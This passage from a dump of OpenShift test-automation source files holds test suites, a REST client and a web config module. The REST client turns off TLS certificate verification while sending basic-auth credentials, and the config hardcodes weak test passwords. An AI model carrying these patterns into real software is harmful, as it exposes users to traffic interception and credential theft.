cssobj\n for k in newdata.keys():\n if result.has_key(k):\n for l in newdata[k].keys():\n result[k][l] = newdata[k][l]\n else:\n result[k] = newdata[k]\n return result\n\n def remove(self, cssobj, selfish=0):\n \"\"\"\n Remove specified data from the current instance.\n\n cssobj -- a CSS class instance\n\n selfish -- (optional, boolean) If true, the contents\n of self.data will be removed from cssobj.data. If false,\n the contents of cssobj.data will be removed from\n self.data.\n \n \"\"\"\n if selfish:\n result = copy.deepcopy(cssobj)\n rmdata = self.data\n else:\n result = copy.deepcopy(self.data)\n rmdata = cssobj \n for k in rmdata.keys():\n if result.has_key(k):\n for m in rmdata[k].keys():\n if result[k].has_key(m):\n del result[k][m]\n if not result[k]:\n del result[k]\n return result\n\n \nif __name__ == '__main__':\n import sys, os\n cssfile = raw_input('What file would you like to parse?\\n> ')\n cssfile = string.strip(cssfile)\n if string.find(cssfile, '~/') == 0:\n try:\n cssfile = os.path.join(os.environ['HOME'], cssfile[2:])\n except:\n print \"\"\"This system appears not to support filenames beginning\nwith '~'. Please try again using the full path.\n\"\"\"\n sys.exit()\n try:\n mycss = CSS(cssfile)\n print \"\"\"'%s' successfully parsed. Data is as follows:\n\n%s\n \"\"\" % (cssfile, mycss)\n except:\n print \"\"\"Failed to parse '%s.' Please check for CSS syntax\nerrors. If your CSS file is correct, please send a\ndetailed bug report to <[email protected]>, including\na copy of '%s'.\n \"\"\"\n" }, { "alpha_fraction": 0.6840579509735107, "alphanum_fraction": 0.717391312122345, "avg_line_length": 23.64285659790039, "blob_id": "f0a92f637daba93fb7ad799b08ca49fc8d3b2d98", "content_id": "da31db1e7d89957d9360677f8cbbb67f859ba0da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "no_license", "max_line_length": 104, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/ruby18_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby18_without_jenkins import Ruby18HotDeployWithoutJenkins\n\nclass Ruby18HotDeployWithJenkins(Ruby18HotDeployWithoutJenkins):\n def __init__(self, config):\n Ruby18HotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2443]Hot deployment support for application - with Jenkins - ruby-1.8\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Ruby18HotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6764890551567078, "alphanum_fraction": 0.697805643081665, "avg_line_length": 28.518518447875977, "blob_id": "cd6ad3350d7675234eaa5cd7c3f9d153a29f52dc", "content_id": "1882edbee25dd53df7c66cf1badccf7629e0efd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1595, "license_type": "no_license", "max_line_length": 491, "num_lines": 54, "path": "/automation/open/testmodules/UI/web/case_145623.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_145623.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass SignInFirstTime(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login_new(web.username_not_accept_terms_account,web.password_not_accept_terms_account)\n web.assert_text_equal_by_xpath(\"Legal terms\",\"//div[@id='content']/div/div/div/div/div/h1\")\n web.assert_text_equal_by_xpath('''Please Accept the Following Terms\\nBefore participating in the OpenShift Preview Program and receiving the Preview Services, Preview Software and access to online properties, you need to accept certain terms and conditions. The link below contains a list of the terms that will apply to your use.\\nOpenShift Legal Terms and Conditions\\nClicking I accept means that you agree to the above terms.''',\"//div[@id='content']/div/div/div/div/div/section\")\n\n \n self.tearDown()\n\n return self.passed(\" case_145623--SignInFirstTime passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SignInFirstTime)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_145623.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5963888764381409, "alphanum_fraction": 0.597777783870697, "avg_line_length": 27.34645652770996, "blob_id": "45725d4730e0472418b4500a4db19abc820c2670", "content_id": "0855b1e1eee668554d8c1bc62a0ef82a7423b608", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3600, "license_type": "no_license", "max_line_length": 90, "num_lines": 127, "path": "/automation/open/lib/rest_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom StringIO import StringIO\nfrom urllib import urlencode\nimport pycurl\nimport common\n\n#\n# Valid return outputs are:\n# 1. http_code\n# 2. http_output\n#\nclass RHC:\n\n def __init__(self, path, output = \"http_code\", format = \"application/xml\"):\n server = common.get_instance_ip()\n (username, password) = common.get_default_rhlogin()\n\n self.output = output\n self.curl = pycurl.Curl()\n\n print \"Configuring URL...\"\n self.curl.setopt(pycurl.URL, \"https://%s/broker/rest/%s\" % (server, path))\n\n print \"Configuring Verbosity...\"\n self.curl.setopt(pycurl.VERBOSE, 1)\n\n print \"Configuring HTTP Basic Auth...\"\n self.curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)\n\n print \"Configuring Username and Password...\"\n self.curl.setopt(pycurl.USERPWD, \"%s:%s\" % ( username, password ))\n\n print \"Configuring SSL_Verify_Peer option...\"\n self.curl.setopt(pycurl.SSL_VERIFYPEER, 0)\n\n if output == \"http_output\":\n print \"Configuring the writer function...\"\n self.b = StringIO()\n self.curl.setopt(pycurl.WRITEFUNCTION, self.b.write)\n \n print \"Configuring HTTP headers %s...\" % ( format )\n self.curl.setopt(pycurl.HTTPHEADER, [ \"Accept: %s\" % ( format )])\n\n def set_option(self, option, value):\n self.curl.setopt(option, value)\n \n def perform(self):\n print \"Performing...\"\n self.curl.perform()\n\n def get_output(self):\n \"\"\"\n This function returns the required output. \n Currently the following output types are supported:\n\n http_code = The HTTP return code\n http_output = The content itself\n\n Reuiered output type is configured in the constructor.\n \"\"\"\n \n if self.output == \"http_code\":\n return self.curl.getinfo(pycurl.HTTP_CODE)\n elif self.output == \"http_output\":\n return self.b.getvalue()\n\n#\n# RHC REST - GET\n#\ndef rhc_rest_get(path, output = \"http_code\", format = \"applicaiton/xml\"):\n curl = RHC(path, output, format)\n curl.perform()\n\n return curl.get_output()\n\n#\n# RHC REST - POST\n#\ndef rhc_rest_post(path, output = \"http_code\", format = \"application/json\", data = dict()):\n # Init\n curl = RHC(path, output, format)\n\n print \"Configuring POST...\"\n curl.set_option(pycurl.POST, 1)\n\n print \"Configuring POST fields...\"\n curl.set_option(\n pycurl.POSTFIELDS,\n urlencode(data)\n )\n\n curl.perform()\n\n return curl.get_output()\n\ndef scale_up(domain, application):\n return rhc_rest_post(\n \"domains/%s/applications/%s/events\" % ( domain, application ),\n output = \"http_code\",\n format = \"application/xml\",\n data = { \"event\" : \"scale-up\" }\n )\n\ndef scale_down(domain, application):\n return rhc_rest_post(\n \"domains/%s/applications/%s/events\" % ( domain, application ),\n output = \"http_code\",\n format = \"application/xml\",\n data = { \"event\" : \"scale-down\" }\n )\n\ndef add_alias(domain, application, alias):\n return rhc_rest_post(\n \"domains/%s/applications/%s/events\" % ( domain, application), \n output = \"http_code\",\n format = \"application/xml\",\n data = { \"event\" : \"add-alias\", \"alias\" : alias }\n )\n\ndef remove_alias(domain, application, alias):\n return rhc_rest_post(\n \"domains/%s/applications/%s/events\" % ( domain, application ), \n output = \"http_code\", \n format = \"application/xml\",\n data = { \"event\" : \"remove-alias\", \"alias\" : alias }\n )\n" }, { "alpha_fraction": 0.6424344778060913, "alphanum_fraction": 0.6546914577484131, "avg_line_length": 37.14516067504883, "blob_id": "95d102d9d01e77b4056904d3b65028157ebd9f84", "content_id": "0e3f27b75206ef0cfc55d42e59adbbdded8fd07b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4732, "license_type": "no_license", "max_line_length": 126, "num_lines": 124, "path": "/automation/open/testmodules/UI/web/config.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n##Gloabal varible configuration\n#set gloable varible values\nimport string\nimport ConfigParser\n\nclass Config():\n def __init__(self):\n configparse = ConfigParser.RawConfigParser()\n configparse.read('config.cfg')\n self.timeoutsec=configparse.get('environment', 'timeoutsec')\n self.password=configparse.get('environment', 'password')\n self.browser=configparse.get('environment', 'browser')\n self.browserpath=configparse.get('environment', 'browserpath')\n self.proxy=configparse.get('environment', 'proxy')\n self.url=configparse.get('environment', 'url')\n self.resultfile=configparse.get('output', 'resultfile')\n self.description=configparse.get('output', 'description')\n self.title=configparse.get('output', 'title')\n self.confirm_url_express=configparse.get('environment', 'confirm_url_express')\n self.confirm_url_express_yujzhang=configparse.get('environment', 'confirm_url_express_yujzhang')\n self.confirm_url_express_yujzhang_invalidkey=configparse.get('environment', 'confirm_url_express_yujzhang_invalidkey')\n self.confirm_url_flex=configparse.get('environment', 'confirm_url_flex')\n self.restricted_user=configparse.get('environment', 'restricted_user')\n self.invalid_user=configparse.get('environment', 'invalid_user')\n self.toregister_user=configparse.get('environment', 'toregister_user')\n self.new_user=configparse.get('environment', 'new_user')\n self.granted_user = [\"[email protected]\",\"123456\"]\n self.granted_user2 = [\"[email protected]\",\"111111\"]\n self.rhn_user = [\"[email protected]\",\"redhat\"]\n self.exist_domain=configparse.get('environment', 'exist_domain')\n self.ssh_key_file=configparse.get('environment', 'ssh_key_file')\n self.tochangepwduser = [\"[email protected]\",\"111111\",\"111111\"]\n self.domainuser = [\"[email protected]\",\"111111\"]\n self.libra_server=configparse.get('environment', 'libra_server')\n self.dashboard_path=self.url+\"/app/dashboard\"\n self.control_panel=self.url+\"/app/control_panel\"\n self.registration_page=self.url+\"/app/user/new\"\n self.express_registration_page=self.url+\"/app/user/new/express\"\n self.flex_registration_page=self.url+\"/app/user/new/flex\"\n self.flex_console=self.url+\"/flex/flex/index.html\"\n\nif __name__ == \"__main__\":\n self = Config()\n\n\ndef baseconfirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return confirmation_link[:pathstart]\n\ndef email(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return str.replace(str.replace(temp_email,\"%2B\",\"+\"),\"%40\",\"@\")\n\ndef invalidemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+ str.replace(path,temp_email,\"ere\")\n\ndef invalidkey_confirm_url(confirmation_link):\n# process_email_confirm_link(confirmation_link)\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+str.replace(path,key,\"rere\")\n\ndef noemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path[:j-1]\n\ndef nokey_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path[:m+1]+path[j+1:]\n\ndef validemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path\n\n\n" }, { "alpha_fraction": 0.6130977869033813, "alphanum_fraction": 0.620853066444397, "avg_line_length": 30.33783721923828, "blob_id": "75e118019baddadd618aaa277c62e9e779f79111", "content_id": "16381dd8f8345a8541db6cce0620089c6fe28492", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2321, "license_type": "no_license", "max_line_length": 358, "num_lines": 74, "path": "/automation/open/testmodules/RT/cartridge/horiz_scaling_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\n#\n# File name: horiz_scaling_mysql.py\n# Date: 2012/03/09 02:30\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n\n self.app_name = 'scalapp'\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass HorizScalingMysql(OpenShiftTest):\n def test_method(self):\n #1. create manually scalable APP\n ret = common.create_scalable_app(self.app_name, \n common.app_types[self.app_type],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd)\n\n self.assert_equal(ret, 0, \"Unable to create scalable PHP application\")\n\n #embed with MYSQL\n ret = common.embed(self.app_name,\n \"add-%s\"%common.cartridge_types['mysql'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret,0, \"To embed MySQL should work\")\n #or use this direct call?\n #cmd = 'curl -k -H \"Accept: application/xml\" -u \"%s:%s\" https://%s/broker/rest/domains/%s/applications/scala/cartridges -X POST -d name=%s -d cartridge=%s -d %s=\"%s\"'%(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, libra_server, self.config.OPENSHIFT_domain_name, self.app_name,common.cartridge_types['mysql'],'haproxy','mysql')\n #(status, output) = common.command_getstatusoutput(cmd)\n #if status!=0:\n # print \"ERROR: Unable to create scalable PHP application\"\n # sys.exit(status)\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n #if case.testcase_status == 'FAILED':\n # return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(HorizScalingMysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of horiz_scaling_mysql.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5364806652069092, "alphanum_fraction": 0.5364806652069092, "avg_line_length": 12.423076629638672, "blob_id": "8e4fdb9bfaafc7d18e97a4b9c7817882c1c7fc84", "content_id": "014cc2547a9b3b81ec5dc87455cffd1d463d3a8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 699, "license_type": "no_license", "max_line_length": 48, "num_lines": 52, "path": "/automation/open/code.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "****************************\nAuto Generated Documentation\n****************************\n\nIndices and tables\n==================\n\n* :ref:`modindex`\n\n.. autosummary::\n\nCore RHTest\n===========\n\n.. automodule:: rhtest \n :members:\n\n.. automodule:: rhtestrunner\n :members:\n\n.. automodule:: tcms\n :members:\n\n.. automodule:: storage\n :members:\n\n.. automodule:: OSConf\n :members:\n\nCommon and Helper functions\n===========================\n\n.. automodule:: common\n :members:\n\n.. automodule:: helper\n :members:\n\n.. automodule:: proc\n :members:\n\nWeb support\n-----------\n\n.. automodule:: autoweb\n :members:\n\n\nNaming conventions\n==================\n\n.. literalinclude:: docs/nameing_conventions.txt\n\n" }, { "alpha_fraction": 0.6064993739128113, "alphanum_fraction": 0.6135778427124023, "avg_line_length": 45.0444450378418, "blob_id": "8a2f137425e5ec826b21a117941c761082bff13c", "content_id": "655168182febe11714d632d67a4078430ff45645", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6216, "license_type": "no_license", "max_line_length": 179, "num_lines": 135, "path": "/automation/open/testmodules/RT/cartridge/configuration_files_referceable_in_standalone_xml.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US994][rhc-cartridge] Configuration files refereceable in standalone.xml\"\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_name = \"standalone\" + common.getRandomString(4)\n self.app_type = common.app_types[\"jbossas\"]\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n self.app_uuid = \"\"\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n os.system('rm -rf %s*' % (self.app_uuid))\n\n\nclass ConfigurationFilesReferceableInStandaloneXml(OpenShiftTest):\n\n def check_softlink(self):\n self.app_uuid = OSConf.get_app_uuid(self.app_name)\n exp_str = \"xx.xml -> /var/lib/openshift/%s/app-root/runtime/repo/.openshift/config/xx.xml\" % (self.app_uuid)\n cmd = \"cd %s/jbossas-7/jbossas-7/standalone/configuration && ls -l\" % (self.app_uuid)\n (ret, output) = common.command_getstatusoutput(cmd)\n if ret == 0 and output.find(exp_str) != -1:\n self.info(\"Successfully find '%s' in the output\" % (exp_str))\n return 0\n else:\n self.info(\"Failed to find '%s' in the output\" % (exp_str))\n return 1\n\n def test_method(self):\n # 1.Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. Create an jbossas app: %s\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0,\n ))\n # 2.Make some changes to the git repo\n self.steps_list.append(testcase.TestCaseStep(\"2.Make some changes to the git repo\",\n \"touch %s/.openshift/config/xx.xml && [ -d %s/.openshift/config/modules/ ] || mkdir %s/.openshift/config/modules/\" % (self.git_repo, self.git_repo, self.git_repo),\n expect_description=\"Git repo successfully modified\",\n expect_return=0,\n ))\n # 3.Git push all the changes\n self.steps_list.append(testcase.TestCaseStep(\"3.Git push all the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"Git push should succeed\",\n expect_return=0,\n ))\n # 4.Check app via browser\n self.steps_list.append(testcase.TestCaseStep(\"4.Check the app via browser\",\n common.check_web_page_output,\n function_parameters=[self.app_name, ],\n expect_description=\"The app should be available\",\n expect_return=0\n ))\n # 5.Save snapshot of this app and extract\n self.steps_list.append(testcase.TestCaseStep(\"5.Save snapshot of this app\",\n \"rhc snapshot save %s -l %s -p '%s' %s && tar xzf %s.tar.gz\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS, self.app_name),\n expect_description=\"Snapshot should be saved and extracted successfully\",\n expect_return=0,\n ))\n # 6.Check snapshot to see soft link of configuration files\n self.steps_list.append(testcase.TestCaseStep(\"6.Check snapshot to see soft link of configuration files\",\n self.check_softlink,\n expect_description=\"Soft link of configuration files should be found\",\n expect_return=0,\n ))\n # 7.Remove config file in git repo and git push\n self.steps_list.append(testcase.TestCaseStep(\"7.Remove config file in git repo\",\n \"cd %s && git rm .openshift/config/xx.xml && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"Git push should succeed\",\n expect_return=0,\n ))\n # 8.Remove <self.app_name>.tar.gz and the extracted dir\n self.steps_list.append(testcase.TestCaseStep(\"8.Remove <app_name>.tar.gz and the extracted dir\",\n \"rm -rf %s && rm -f %s.tar.gz\" % (self.app_uuid, self.app_name),\n expect_description=\"<app_name>.tar.gz and the extracted dir should be removed\",\n expect_return=0,\n ))\n # 9.Save snapshot again\n self.steps_list.append(testcase.TestCaseStep(\"9.Save snapshot again\",\n \"rhc snapshot save %s -l %s -p '%s' %s && tar xzf %s.tar.gz\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS, self.app_name),\n expect_description=\"Snapshot should be saved and extracted successfully\",\n expect_return=0,\n ))\n # 10.Check snapshot to see soft link of configuration files disappear\n self.steps_list.append(testcase.TestCaseStep(\"10.Check snapshot to see soft link of configuration files disappear\",\n \"ls -l %s/jbossas-7/jbossas-7/standalone/configuration/xx.xml\" % (self.app_uuid),\n expect_description=\"Soft link of configuration files should not be found\",\n expect_return=\"!0\",\n expect_string_list=[\"No such file or directory\",],\n ))\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ConfigurationFilesReferceableInStandaloneXml)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6301020383834839, "alphanum_fraction": 0.6358418464660645, "avg_line_length": 32.36170196533203, "blob_id": "892b604800a2787b18c09b9222af9d01be1eb14a", "content_id": "0ce7423649f5393e766f59a69823d78c8183c5da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1568, "license_type": "no_license", "max_line_length": 99, "num_lines": 47, "path": "/automation/open/testmodules/RT/quick_start/quick_start_gollum_ruby19.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport OSConf\nimport rhtest\n# user defined packages\nfrom time import sleep\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartGollum(QuickStartTest):\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby-1.9\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: gollum - with Ruby 1.9\"\n self.config.git_upstream_url = \"git://github.com/openshift/gollum-openshifted.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Create New Page\"\n \n def verification(self):\n self.log_info(\"Verifying\")\n sleep(30) # Waiting 30 seconds before checking\n app_url = OSConf.get_app_url(self.config.application_name)\n ret_code = common.grep_web_page(\n \"http://%s/\" % app_url,\n self.config.page_pattern,\n options = \"-L -H 'Pragma: no-cache' -u wiki:wiki\" \n )\n self.assert_equal(ret_code, 0, \"Pattern %s must be found\" % self.config.page_pattern)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartGollum)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4941938519477844, "alphanum_fraction": 0.5082508325576782, "avg_line_length": 41.38859939575195, "blob_id": "ca30ea024f4a8ece7227cc5b391835522a8c06f0", "content_id": "4dd6e8705d5d2891d99e560fc019e7c5ebc95e40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8181, "license_type": "no_license", "max_line_length": 157, "num_lines": 193, "path": "/automation/open/testmodules/RT/cartridge/jenkins_ci_testing.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n\nRefactored by\nAttila Nagy\[email protected]\nJun 11, 2012\n\n[US1178 & US1034][RT] Create Jenkins cartridge application for CI testing\nhttps://tcms.engineering.redhat.com/case/122369/\n\"\"\"\n\nimport rhtest\nimport common\nfrom shutil import rmtree\nimport fileinput\nimport re\nimport OSConf\nimport proc\nimport os\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.info(\"[US1178 & US1034] [rhc-cartridge] Create Jenkins cartridge application for CI testing\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing variant, using `zend` as default\")\n self.test_variant = 'jbosseap'\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_name = self.test_variant.split('-')[0] + \"ci\" + common.getRandomString(3)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n common.env_setup()\n self.random_string = common.getRandomString()\n self.deployment_configuration = {\n \"php\": {\"index\": \"php/index.php\"},\n \"zend\": {\"index\": \"php/index.php\"},\n \"jbossas\": {\"index\": \"src/main/webapp/index.html\"},\n \"jbosseap\": {\"index\": \"src/main/webapp/index.html\"},\n \"python\": {\"index\": \"wsgi/application\"},\n \"ruby\": {\"index\": \"config.ru\"},\n \"ruby-1.9\": {\"index\": \"config.ru\"},\n \"nodejs\" : {\"index\": \"index.html\"},\n \"perl\": {\"index\": \"perl/index.pl\"}}\n\n def finalize(self):\n #rmtree(self.app_name, ignore_errors = True)\n if self.test_variant == \"jbossas\" or self.test_variant == \"jbosseap\":\n if self.get_run_mode() == \"DEV\":\n pass\n # back to small profile\n #common.change_node_profile(\"small\")\n #common.remove_gearsize_capability('medium')\n\nclass JenkinsCITesting(OpenShiftTest):\n \n def test_method(self):\n self.info(\"=================================\")\n self.info(\"1.Create an jenkins app\")\n self.info(\"=================================\")\n ret_code = common.create_app(\"server\", common.app_types[\"jenkins\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False)\n self.assert_equal(ret_code, 0, \"Jenkins server must be created successfully\")\n \n self.info(\"=================================\")\n self.info(\"2. Create an application\")\n self.info(\"=================================\")\n ret_code = common.create_app(self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret_code, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n \n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n sleep_time = 600\n # JBoss needs larger node profile to build\n if self.get_run_mode() == \"DEV\":\n #20120615: we don't need to change node profile any more\n pass\n #common.add_gearsize_capability('medium')\n #ret = common.change_node_profile(\"medium\")\n #self.assert_equal(ret, 0, \"The change of node profile to medium should pass.\")\n #time.sleep(30)\n else:\n sleep_time = 300\n \n self.info(\"=================================\")\n self.info(\"3. Embed jenkins client to the app\")\n self.info(\"=================================\")\n ret_code = common.embed(self.app_name, \n \"add-\" + common.cartridge_types[\"jenkins\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret_code, 0, \"Jenkins client must be embedded successfully\")\n \n self.info(\"=================================\")\n self.info(\"4.Make some change in the git repo\")\n self.info(\"=================================\")\n try:\n index_file = self.git_repo + \"/\" + self.deployment_configuration[self.test_variant][\"index\"]\n self.info(\"Editing: \" + index_file)\n for line in fileinput.input(index_file, inplace = True):\n print re.sub(\"Welcome to OpenShift\", self.random_string, line),\n except:\n fileinput.close()\n self.info(\"IO error\")\n return False\n fileinput.close()\n \n try:\n start_hook_file = \"/.openshift/action_hooks/build\"\n #start_hoot_file = \"./.openshift/action_hooks/build\"\n self.info(\"Editing: \" + start_hook_file)\n start_hook = open(self.git_repo + start_hook_file, \"w+\")\n start_hook.write(\"set -x\\nsleep 30\\n\")\n start_hook.close()\n os.chmod(self.git_repo + start_hook_file, 0744)\n except:\n self.info(\"IO Error \")\n return False\n \n self.info(\"=================================\")\n self.info(\"5. Git push all the changes in a subprocess\")\n self.info(\"=================================\")\n deployment_steps = [\n \"cd %s\" % self.app_name,\n \"git add .\",\n \"git commit -a -m testing\",\n \"git push\" \n ]\n deployment_process = proc.Proc(\" && \".join(deployment_steps))\n\n self.info(\"=================================\")\n self.info(\"6. Jenkins build job should start in given time\")\n self.info(\"=================================\")\n ret_code = deployment_process.grep_output(\"Waiting for job to complete\", 5, 60)\n self.assert_equal(ret_code, 0, \"Job must be waiting for start\")\n self.info(\"sleep %ss to wait jenkins job finished\" %(sleep_time))\n\ttime.sleep(sleep_time)\n\n self.info(\"=================================\")\n self.info(\"7. Check if jenkins build job is running\")\n self.info(\"=================================\")\n job_url = OSConf.default.conf['apps'][self.app_name]['embed']['jenkins-client-1.4']['url']\n option = \"-k -H 'Pragma: no-cache' -u %s:%s\" % 